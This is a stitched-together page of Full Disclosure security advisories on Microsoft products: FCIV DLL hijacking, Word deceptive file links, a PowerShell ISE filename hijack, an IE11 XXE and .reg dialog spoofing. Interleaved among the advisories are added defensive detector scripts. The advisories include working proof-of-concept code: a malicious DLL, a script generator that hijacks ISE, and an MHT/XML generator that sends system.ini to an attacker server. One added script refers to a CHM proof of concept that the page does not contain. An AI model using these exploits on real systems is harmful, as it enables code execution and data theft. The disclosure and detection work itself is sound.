https://www.microsoft.com/en-us/download/details.aspx?id=11533

Excerpt from the FCIV "ReadMe.txt" file.

"Fciv is a command line utility that computes and verifies hashes of files.

It computes a MD5 or SHA1 cryptographic hash of the content of the file.
If the file is modified, the hash is different.

With fciv, you can compute hashes of all your sensitive files.
When you suspect that your system has been compromised, you can run a
verification to determine which files have been modified.
You can also schedule verifications regularily."


[Vulnerability Type]
DLL Hijacking Arbitrary Code Execution


[CVE Reference]
N/A


[Security Issue]
File Checksum Integrity Verifier "fciv.exe" will load and execute arbitrary
DLLs named "CRYPTSP.dll" or "USERENV.dll"
when verifying a file hash, if one of those DLLs exists in the same
directory (CWD) from where FCIV is run.

During testing I observed that on a Windows 10 system both "CRYPTSP.dll" and
"USERENV.dll" will execute with no problem.
However, only "CRYPTSP.dll" seems to work on the Windows 7 machine I tested.

Therefore, if malware is named "CRYPTSP.dll" or "USERENV.dll" and you try
to verify its hash, it will instead get executed.
Upon a successful exploit the user will get the following error.

//
// File Checksum Integrity Verifier version 2.05.
//

Error during CryptAcquireContext.
Error msg  : The specified procedure could not be found.
Error code : 7f


Again, to exploit this the victim must run the FCIV from an infected
directory where the compromised DLL lives.

c:\>fciv.exe "CRYPTSP.dll"

Or from a network share where an attacker has write privileges.

net use z: \\x.x.x.x\c$ /user:victim
z:\Users\victim\Desktop>fciv.exe c:\Windows


This was tested successfully on Windows 7/10


[Exploit/POC]
Create a DLL named "cryptsp.dll" and download it to your default Downloads
directory or wherever.

"evil.c"

#include <windows.h>
//gcc -shared -o cryptsp.dll evil.c

//payload: launches calc.exe as proof of code execution
void evilo(void){
    WinExec("calc", 0);
}

//DllMain runs as soon as fciv.exe loads this DLL from the working directory
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    evilo();
    return 0;
}

Start fciv.exe from the same dir where cryptsp.dll resides to verify the
hash of the DLL.
C:\Users\victim\Downloads>fciv.exe cryptsp.dll

BOOM! No hash verified, but we do get arbitrary code execution...


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification:  June 3, 2019
MSRC Response: "The Checksum Integrity Verifier tool is not supported by
Microsoft." : June 7, 2019
July 4, 2019 : Public Disclosure




hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
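As an added detection example (my code, not the advisory's), the following Python flags the behaviour described above from image-load telemetry: an fciv.exe process loading CRYPTSP.dll or USERENV.dll from anywhere other than the system directories. The events are constructed, simplified key=value lines modelled on Sysmon Event ID 7 (ImageLoad) fields rather than real log output, and the trusted-directory list assumes a standard C: system root.

```python
import re
from pathlib import PureWindowsPath

# DLL names the advisory reports fciv.exe loads from its working directory.
HIJACKABLE_DLLS = {"cryptsp.dll", "userenv.dll"}

# Where these DLLs legitimately live (assumption: standard C: system root).
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")

# Constructed sample events in a simplified key=value line form modelled on
# Sysmon Event ID 7 (ImageLoad) fields. Not real Sysmon output.
SAMPLE_EVENTS = [
    "EventID=7 Image=C:\\Tools\\fciv.exe ImageLoaded=C:\\Windows\\System32\\cryptsp.dll Signed=true",
    "EventID=7 Image=C:\\Tools\\fciv.exe ImageLoaded=C:\\Users\\victim\\Downloads\\cryptsp.dll Signed=false",
    "EventID=7 Image=C:\\Windows\\System32\\notepad.exe ImageLoaded=C:\\Windows\\System32\\userenv.dll Signed=true",
    "EventID=7 Image=C:\\Tools\\fciv.exe ImageLoaded=Z:\\Users\\victim\\Desktop\\userenv.dll Signed=false",
    "EventID=1 Image=C:\\Tools\\fciv.exe",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Split one key=value line into a dict (sample values contain no spaces)."""
    return dict(FIELD_RE.findall(line))


def is_trusted_dir(path):
    """True when the DLL's directory is one of the system directories."""
    parent = str(PureWindowsPath(path).parent).lower()
    return any(parent == d or parent.startswith(d + "\\") for d in TRUSTED_DIRS)


def hijack_alerts(lines):
    """ImageLoaded paths where fciv.exe loaded a hijackable DLL from outside
    the trusted directories, in input order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7":
            continue
        image = PureWindowsPath(ev.get("Image", "")).name.lower()
        loaded = ev.get("ImageLoaded", "")
        if image != "fciv.exe":
            continue
        if PureWindowsPath(loaded).name.lower() not in HIJACKABLE_DLLS:
            continue
        if not is_trusted_dir(loaded):
            alerts.append(loaded)
    return alerts


if __name__ == "__main__":
    for path in hijack_alerts(SAMPLE_EVENTS):
        print("possible DLL hijack: fciv.exe loaded", path)
```

The same rule expressed against real Sysmon data keys on the Image and ImageLoaded fields of Event ID 7; the Signed field is carried in the samples only because an unsigned copy of a normally signed system DLL is the usual second indicator.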


[FD] Microsoft Word (2016) / Deceptive File Reference Vuln

2019-06-18 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Microsoft Word 2016


[Vulnerability Type]
Deceptive File Reference


[References]
ZDI-CAN-7949


[Security Issue]
When a MS Word ".docx" file contains a hyperlink to another file, it will
run the first file it finds in that directory with a
valid extension, but will present to the end user an extension-less file in
its security warning dialog box without showing the extension type,
if another "empty" file of the same name as the target executable exists
but has no file extension. Because the extension is suppressed it
makes the file seem harmless, and the file can be masked to appear as just a
folder etc.

This can potentially trick a user into running unexpected code, but will only
work when you have an additional file of the same name with
NO extension on it.


[Exploit/POC]
1) Create a directory "PoC"

2) Create a folder in PoC directory named "Downloads Folder"

3) Create a .BAT file named "Downloads Folder.bat"

in the .BAT create some command like "start calc.exe"

4) Create an empty file named "Downloads Folder" with no file extension

5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads
Folder/Downloads Folder"

Upon opening the link Word will give the user a vague dialog box asking
if they want to open
the file. However, the prompt shows an apparent folder structure and no
file extension (.exe, .com etc.)
is visible or displayed to the end user.

Click the link to open what looks to be a folder then BOOM! the .BAT file
runs instead.

Of course any executable will do, .EXE etc.


[Network Access]
Local


[Severity]
High


[POC Video URL]
https://www.youtube.com/watch?v=irxkV_qGG9Y


[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program : 2019-01-25

Case officially contracted to ZDI : 2019-02-06

Vendor Disclosure : 2019-02-15
submitted to the vendor as ZDI-CAN-7949.

ZDI Response : "We have synced with the vendor and they have resolved that
this case
does not meet the bar for security servicing. Therefore we will proceed to
close it on our end."

2019-06-14 : Public Disclosure




hyp3rlinx

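An added audit example for the condition described above (my code, not the advisory's or Microsoft's): it pulls the External hyperlink targets out of a .docx via its word/_rels/document.xml.rels part, flags targets whose final path component carries no extension, and checks a directory listing for the precondition the advisory names, an extension-less file sharing its base name with an executable. The sample .docx is built in memory and holds only the relationships part, the directory listing is constructed, and the extension set beyond .bat/.exe/.com is my addition.

```python
import io
import os
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Extensions Windows runs when a bare name resolves to them. .bat, .exe and
# .com come from the advisory; the others are my additions.
EXEC_EXTS = {".bat", ".exe", ".com", ".cmd", ".scr", ".pif", ".vbs", ".js"}

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RELS_PART = "word/_rels/document.xml.rels"


def external_hyperlink_targets(docx):
    """External hyperlink targets declared in a .docx (path or bytes), URL-decoded."""
    src = io.BytesIO(docx) if isinstance(docx, (bytes, bytearray)) else docx
    with zipfile.ZipFile(src) as z:
        root = ET.fromstring(z.read(RELS_PART))
    targets = []
    for rel in root.iter(RELS_NS + "Relationship"):
        if rel.get("Type", "").endswith("/hyperlink") and rel.get("TargetMode") == "External":
            targets.append(unquote(rel.get("Target", "")))
    return targets


def extensionless(target):
    """True when the final path component of a link target has no extension."""
    last = target.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1]
    return os.path.splitext(last)[1] == ""


def find_shadowed_executables(names):
    """(bare_name, executable) pairs in one directory listing where an
    extension-less entry shares its base name with an executable."""
    bare = {n.lower(): n for n in names if os.path.splitext(n)[1] == ""}
    pairs = []
    for n in names:
        base, ext = os.path.splitext(n)
        if ext.lower() in EXEC_EXTS and base.lower() in bare:
            pairs.append((bare[base.lower()], n))
    return pairs


def build_sample_docx():
    """Constructed minimal .docx holding only the relationships part, with
    the hyperlink target from the advisory's PoC steps."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId5" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="PoC/Downloads%20Folder/Downloads%20Folder" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(RELS_PART, rels)
    return buf.getvalue()


# Constructed listing of the PoC's "Downloads Folder" directory.
SAMPLE_LISTING = ["Downloads Folder", "Downloads Folder.bat", "readme.txt", "notes"]


def audit(docx, listing):
    """Extension-less link targets, plus bare-name/executable collisions in
    the directory listing the link points into."""
    risky = [t for t in external_hyperlink_targets(docx) if extensionless(t)]
    return risky, find_shadowed_executables(listing)


if __name__ == "__main__":
    print(audit(build_sample_docx(), SAMPLE_LISTING))
```

On a real share the listing would come from os.listdir on the link's parent directory; the hyperlink extraction works on any .docx, since Word stores external links only in the relationships part.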


[FD] Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day

2019-05-04 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt

[+] ISR: ApparitionSec
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell ISE

The Windows PowerShell Integrated Scripting Environment (ISE) is a host
application for Windows PowerShell.
In the ISE, you can run commands and write, test, and debug scripts in a
single Windows-based graphic user interface.


[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day


[References]
ZDI-CAN-8005


[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging
specially crafted PowerShell scripts that contain
array brackets as part of the filename. This can result in ISE executing
attacker supplied scripts pointed to by the filename
and not the "trusted" PS file currently loaded and being viewed by a user
in the host application. This undermines the integrity of
PowerShell ISE allowing potential unexpected remote code execution.

In PowerShell brackets are used to access array elements.

PS C:\> $a=1..10
PS C:\> $a[4]
5

However, when brackets are used as part of the filename they can be used to
hijack the currently loaded file in place of another malicious file.
That file must contain a single matching char value which is also found in
our specially crafted filename.

The requirement is that both files reside in the same directory. For example, if
a file named [HelloWorldTutoria1].ps1 resides alongside a
file named 1.ps1 it will create a script hijacking condition. Note, the
last letter is a number "1" not a lowercase "L".

Another thing I discovered playing with PS filenames is that we can target
scripts using a single alphabetic or numeric char and certain symbols.
PowerShell scripts with only a single quote also work: [Pwned'].ps1 will
load and execute ===> '.ps1 if debugged from the vuln ISE application.

These chars also get the job done:
"$" "_" "#" "^"  plus any single case insensitive letter a-z or numbers
0-9, [Hello_World].ps1 > _.ps1

[Hello].ps1 will execute this instead => h.ps1

Dashes "-" throw the following error: "The specified wildcard character
pattern is not valid: [Hello-World].ps1" when pointing to
another PS file named -.ps1 and seems to treat it sort of like a
meta-character.

[pw3d].ps1 <= expected to execute

3.ps1 <= actually executed

This exploits the trust between PowerShell ISE and the end user. So scripts
debugged locally or over a network share display "trusted" code
in ISE that is expected to run. However, when the user debugs the script a
different script gets executed.
Interestingly, that second script does NOT get loaded into PowerShell ISE
upon execution, so a user may not see anything amiss.

User interaction is required for a successful attack to occur and obviously
running any unknown PowerShell script can be dangerous.
Again, this exploit takes advantage of "trust" where users can see and read
the code and will trust it as everything looks just fine, and
yet ... still they get PWNED!

Tested successfully on Win7/10

Long live user interaction! lol...


[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw


[Exploit/POC]
After opening PS files in ISE, set the execution policy so you can test without
issues.
set-executionpolicy unrestricted -force

PS scripts over network shares may hit a 'RemoteSigned' security policy issue,
so run the command below.

set-executionpolicy unrestricted -force process
Choose 'R' to run once.

The Python script below will create two .ps1 files to demonstrate the
vulnerable condition.
Examine the code, what does it say? It reads... Write-Output "Hello
World!"... now run it...

BAM! The other PS script executes!


#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec


fname1="[HelloWorldTutoria1].ps1"   #Expected code to run is 'HelloWorld!'
fname2="1.ps1"                      #Actual code executed is calc.exe for PoC
evil_code="start calc.exe"          #Edit to suit your needs.
c=0
payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'

def mk_ps_hijack_script():
    #First call writes fname1/payload1, the recursive second call fname2/payload2
    global c
    c+=1
    f=open(globals()["fname"+str(c)],"w")
    f.write(globals()["payload"+str(c)])
    f.close()
    if c<2:
        mk_ps_hijack_script()


if __name__=="__main__":
    mk_ps_hijack_script()
    print("PowerShell ISE Xploit 0day Files Created!")
    print("Discovery by hyp3rlinx")
    print("ZDI-CAN-8005")



[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
ZDI Case opened : 2019-02-06
Case officially contracted to ZDI : 2019-02-20

Vendor Disclosu
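An added example (my code, not the advisory's) that models the resolution described above: it translates PowerShell wildcard syntax (*, ?, [set], [a-z]) into a regex, matched case-insensitively as on Windows, and reports which sibling .ps1 files a bracketed filename would select instead of itself. It generalises beyond the page's individual examples to any bracket set, and it rejects a reversed range such as the o-W inside [Hello-World], which is where the advisory's dash error shows up. The filenames are constructed; the translation is my approximation of PowerShell's wildcard rules, not its implementation.

```python
import re


def _translate_set(body):
    """Translate the inside of a PowerShell [...] set to a regex class.
    A lo-hi range with lo above hi is rejected, which is how the advisory's
    dash case ([Hello-World].ps1) surfaces as an invalid pattern."""
    if not body:
        raise ValueError("empty wildcard set")
    out, k = [], 0
    while k < len(body):
        if k + 2 < len(body) and body[k + 1] == "-":
            lo, hi = body[k], body[k + 2]
            if ord(lo) > ord(hi):
                raise ValueError(
                    "The specified wildcard character pattern is not valid: [%s]" % body)
            out.append(re.escape(lo) + "-" + re.escape(hi))
            k += 3
        else:
            out.append(re.escape(body[k]))
            k += 1
    return "[" + "".join(out) + "]"


def ps_wildcard_to_regex(pattern):
    """Anchored, case-insensitive regex for a PowerShell wildcard pattern."""
    out, i = [], 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "*":
            out.append(".*")
        elif ch == "?":
            out.append(".")
        elif ch == "[":
            j = pattern.find("]", i + 1)
            if j < 0:
                raise ValueError("unterminated wildcard set in " + pattern)
            out.append(_translate_set(pattern[i + 1:j]))
            i = j
        else:
            out.append(re.escape(ch))
        i += 1
    return re.compile("^" + "".join(out) + "$", re.IGNORECASE)


def resolve_script_target(opened_name, siblings):
    """Sibling files the opened script's name selects when treated as a
    wildcard pattern, excluding the opened file itself (sorted)."""
    rx = ps_wildcard_to_regex(opened_name)
    return sorted(n for n in siblings if n != opened_name and rx.match(n))


def audit_script_dir(names):
    """Map each wildcard-named .ps1 in a listing to the files it would
    resolve to instead; invalid patterns are reported rather than raised."""
    findings = {}
    for n in names:
        if not n.lower().endswith(".ps1") or not any(c in n for c in "*?["):
            continue
        try:
            hits = resolve_script_target(n, names)
        except ValueError as e:
            hits = ["INVALID PATTERN: " + str(e)]
        if hits:
            findings[n] = hits
    return findings


if __name__ == "__main__":
    # Constructed listing reproducing the advisory's pairs.
    listing = ["[HelloWorldTutoria1].ps1", "1.ps1", "[pw3d].ps1", "3.ps1", "Plain.ps1"]
    for script, hits in audit_script_dir(listing).items():
        print(script, "->", hits)
```

Run audit_script_dir over the listing of a scripts share before anyone opens files from it in ISE; any entry in the result is a name that resolves to a different file than the one displayed.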

Re: [FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day

2019-04-18 Thread hyp3rlinx
Vimeo reinstated my account a few hours later but I switched to YouTube for
now.. but will check those out.

Thank you for that...
hyp3rlinx

On Tue, Apr 16, 2019 at 4:12 AM bo0od  wrote:

> have your own videos either on one of the PeerTubes instances or have
> your own instance.
>
> https://joinpeertube.org/en/
>
> other good alternative would be:
>
> https://mediagoblin.org/pages/tour.html
>
> Enjoy!
>
> hyp3rlinx:
> > vimeo removed my account for no good reason so new POC url is included.
> >
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source:
> >
> http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
> > [+] ISR: ApparitionSec
> >
> >
> > [Vendor]
> > www.microsoft.com
> >
> >
> > [Product]
> > Microsoft Internet Explorer v11
> > (latest version)
> >
> > Internet Explorer is a series of graphical web browsers developed by
> > Microsoft and included in the Microsoft Windows line of operating
> systems,
> > starting in 1995.
> >
> >
> > [Vulnerability Type]
> > XML External Entity Injection
> >
> >
> >
> > [CVE Reference]
> > N/A
> >
> >
> >
> > [Security Issue]
> > Internet Explorer is vulnerable to XML External Entity attack if a user
> > opens a specially crafted .MHT file locally.
> >
> > This can allow remote attackers to potentially exfiltrate Local files and
> > conduct remote reconnaissance on locally installed
> > Program version information. Example, a request for
> "c:\Python27\NEWS.txt"
> > can return version information for that program.
> >
> > Upon opening the malicious ".MHT" file locally it should launch Internet
> > Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
> > and other interactions like right click "Print Preview" or "Print"
> commands
> > on the web-page may also trigger the XXE vulnerability.
> >
> > However, a simple call to the window.print() Javascript function should
> do
> > the trick without requiring any user interaction with the webpage.
> > Importantly, if files are downloaded from the web in a compressed archive
> > and opened using certain archive utilities MOTW may not work as
> advertised.
> >
> > Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP"
> > users will get a security warning bar in IE and be prompted
> > to activate blocked content. However, when opening a specially crafted
> .MHT
> > file using malicious  markup tags the user will get no such
> > active content or security bar warnings.
> >
> > e.g.
> >
> > C:\sec>python -m SimpleHTTPServer
> > Serving HTTP on 0.0.0.0 port 8000 ...
> > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
> > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET
> >
> /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
> > HTTP/1.1" 200 -
> >
> >
> > Tested successfully in latest Internet Explorer Browser v11 with latest
> > security patches on Win7/10 and Server 2012 R2.
> >
> >
> >
> > [POC/Video URL]
> > https://www.youtube.com/watch?v=fbLNbCjgJeY
> >
> >
> >
> > [Exploit/POC]
> > POC to exfil  Windows "system.ini" file.
> > Note: Edit attacker server IP in the script to suit your needs.
> >
> > 1) Use below script to create the "datatears.xml" XML and XXE embedded
> > "msie-xxe-0day.mht" MHT file.
> >
> > 2) python -m SimpleHTTPServer
> >
> > 3) Place the generated "datatears.xml" in Python server web-root.
> >
> > 4) Open the generated "msie-xxe-0day.mht" file, watch your files be
> > exfiltrated.
> >
> >
> > #Microsoft Internet Explorer XXE 0day
> > #Creates malicious XXE .MHT and XML files
> > #Open the MHT file in MSIE locally, should exfil system.ini
> > #By hyp3rlinx
> > #ApparitionSec
> >
> > ATTACKER_IP="localhost"
> > PORT="8000"
> >
> > mht_file=(
> > 'From:\n'
> > 'Subject:\n'
> > 'Date:\n'
> > 'MIME-Version: 1.0\n'
> > 'Content-Type: multipart/related; type="text/html";\n'
> > '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001&quo

[FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day

2019-04-13 Thread hyp3rlinx
Vimeo removed my account for no good reason, so a new POC URL is included.

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer v11
(latest version)

Internet Explorer is a series of graphical web browsers developed by
Microsoft and included in the Microsoft Windows line of operating systems,
starting in 1995.


[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
N/A



[Security Issue]
Internet Explorer is vulnerable to XML External Entity attack if a user
opens a specially crafted .MHT file locally.

This can allow remote attackers to potentially exfiltrate local files and
conduct remote reconnaissance on locally installed
program version information. For example, a request for "c:\Python27\NEWS.txt"
can return version information for that program.

Upon opening the malicious ".MHT" file locally it should launch Internet
Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
and other interactions like right click "Print Preview" or "Print" commands
on the web-page may also trigger the XXE vulnerability.

However, a simple call to the window.print() Javascript function should do
the trick without requiring any user interaction with the webpage.
Importantly, if files are downloaded from the web in a compressed archive
and opened using certain archive utilities MOTW may not work as advertised.

Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP"
users will get a security warning bar in IE and be prompted
to activate blocked content. However, when opening a specially crafted .MHT
file using malicious  markup tags the user will get no such
active content or security bar warnings.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET
/?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
HTTP/1.1" 200 -


Tested successfully in latest Internet Explorer Browser v11 with latest
security patches on Win7/10 and Server 2012 R2.



[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY



[Exploit/POC]
POC to exfil the Windows "system.ini" file.
Note: Edit the attacker server IP in the script to suit your needs.

1) Use below script to create the "datatears.xml" XML and XXE embedded
"msie-xxe-0day.mht" MHT file.

2) python -m SimpleHTTPServer

3) Place the generated "datatears.xml" in Python server web-root.

4) Open the generated "msie-xxe-0day.mht" file, watch your files be
exfiltrated.


#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'

'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
    #Write payload string p to the file named f
    out=open(f,"w")
    out.write(p)
    out.close()


if __name__ == "__main__":
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
    print("Microsoft Internet Explorer XML External Entity 0day PoC.")
    print("Files msie-xxe-0day.mht and datatears.xml Created!.")
    print("Discovery: Hyp3rlinx / Apparition Security")




[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019
Case Opened: March 28, 2019
MSRC response April 10, 2019: "We determined that a fix for this issue will
be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the
fix for this issue, and we have cl
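This added detection example (my code, not the advisory's) covers both the uncompiled .chm.chm PoC earlier on this page and the .MHT case in this post: an MHT is a MIME container, so each part is unpacked with the email module, while an uncompiled CHM is plain HTML and is scanned as-is. Either way every SYSTEM/PUBLIC entity declaration in a DOCTYPE internal subset is reported, with whether it is a parameter entity, whether its URI is remote, and whether the subset actually expands it. The two samples are constructed to mirror the page's entity names and localhost URLs; they are not the advisory's files.

```python
import email
import re

# One SYSTEM or PUBLIC entity declaration; %-prefixed names are parameter entities.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+"
    r"(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+)"
    r"(?:\"(?P<uri>[^\"]*)\"|'(?P<uri2>[^']*)')",
    re.IGNORECASE,
)
REMOTE_PREFIXES = ("http:", "https:", "ftp:", "\\\\", "//")

# Constructed MHT modelled on the advisory's generator output: one text/html
# part whose DOCTYPE internal subset pulls a remote parameter entity.
SAMPLE_MHT = (
    "From: <Saved by Windows Internet Explorer>\n"
    "Subject: sample\n"
    "MIME-Version: 1.0\n"
    "Content-Type: multipart/related; type=\"text/html\"; boundary=\"----=_NextPart_000\"\n"
    "\n"
    "This is a multi-part message in MIME format.\n"
    "\n"
    "------=_NextPart_000\n"
    "Content-Type: text/html; charset=\"UTF-8\"\n"
    "Content-Location: main.htm\n"
    "\n"
    "<!DOCTYPE html [\n"
    "<!ENTITY % sp SYSTEM \"http://localhost:8000/datatears.xml\">\n"
    "%sp;\n"
    "]>\n"
    "<html><body>sample</body></html>\n"
    "\n"
    "------=_NextPart_000--\n"
)

# Constructed plain-HTML sample modelled on the uncompiled ".chm.chm" PoC.
SAMPLE_UNCOMPILED_CHM = (
    "<!DOCTYPE html [\n"
    "<!ENTITY % dtd SYSTEM \"http://localhost:81/payload.dtd\">\n"
    "%dtd;\n"
    "]>\n"
    "<html><body>Uncompiled CHM File XXE PoC</body></html>\n"
)

BENIGN_HTML = "<!DOCTYPE html>\n<html><body>nothing to see</body></html>\n"


def _bodies(text):
    """Yield the text to scan: each leaf part of a MIME container, or the
    raw document itself when it is not multipart."""
    msg = email.message_from_string(text)
    if msg.is_multipart():
        for part in msg.walk():
            if not part.is_multipart():
                payload = part.get_payload(decode=True) or b""
                yield payload.decode("utf-8", "replace")
    else:
        yield text


def scan_for_external_entities(text):
    """One finding per SYSTEM/PUBLIC entity declaration in the document."""
    findings = []
    for body in _bodies(text):
        for m in ENTITY_RE.finditer(body):
            name = m.group("name")
            is_param = m.group("param") is not None
            uri = m.group("uri") if m.group("uri") is not None else m.group("uri2")
            ref = ("%" + name + ";") if is_param else ("&" + name + ";")
            findings.append({
                "name": name,
                "parameter": is_param,
                "uri": uri,
                "remote": uri.lower().startswith(REMOTE_PREFIXES),
                "referenced": ref in body,
            })
    return findings


if __name__ == "__main__":
    for label, doc in (("mht", SAMPLE_MHT), ("chm", SAMPLE_UNCOMPILED_CHM), ("benign", BENIGN_HTML)):
        print(label, scan_for_external_entities(doc))
```

A mail or download gateway can run this over .mht, .chm and .chm.chm attachments; a parameter entity that is both remote and referenced is the shape of the payloads in both posts, and a local file: URI in a general entity is the other half of the same chain.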

[FD] [**UPDATED] Microsoft Windows .Reg File / Dialog Box Message Spoofing 0day

2019-03-16 Thread hyp3rlinx
Added a few things I had previously left out that should have been
mentioned earlier.

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the
Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced
by the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to
spoof the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection
shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10),
thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch (if the user runs as
Admin); if targeting a non-privileged user we can still hijack HKCU reg
settings
without having to deal with UAC. After that they will get the registry security
warning dialog box asking them if they "trust the source" and
"Are you sure you want to continue?" etc., and will also have a choice of
either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the
user to wrongly click "Yes", as the expected "Are you sure you want to
continue?"
dialog box message is under our control. The registry dialog echoes back
the filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded
characters in the filename like %n or %r and %0.

For example, the "do not add it to the registry" and "Are you sure you want to
continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?"
warning message to instead read "Click Yes" or whatever else we like.
